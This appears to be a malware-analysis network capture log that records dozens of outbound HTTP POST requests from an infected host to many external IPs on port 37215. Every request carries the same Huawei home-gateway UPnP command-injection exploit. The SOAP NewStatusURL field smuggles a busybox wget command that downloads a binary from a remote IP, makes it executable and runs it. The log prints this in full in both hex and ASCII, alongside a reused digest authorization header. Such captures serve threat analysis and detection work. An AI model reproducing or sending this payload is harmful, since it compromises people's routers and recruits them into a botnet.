                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2506192.168.2.154592641.165.209.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817539930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2507192.168.2.155862041.135.222.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817565918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2508192.168.2.155999441.73.224.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817593098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2509192.168.2.154015241.73.162.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817622900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2510192.168.2.155803841.92.213.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817651033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2511192.168.2.155130841.35.222.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817677975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2512192.168.2.155721641.105.77.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817704916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2513192.168.2.155921241.48.139.537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817732096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2514192.168.2.155114641.13.73.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818614006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2515192.168.2.153558641.199.138.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818636894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
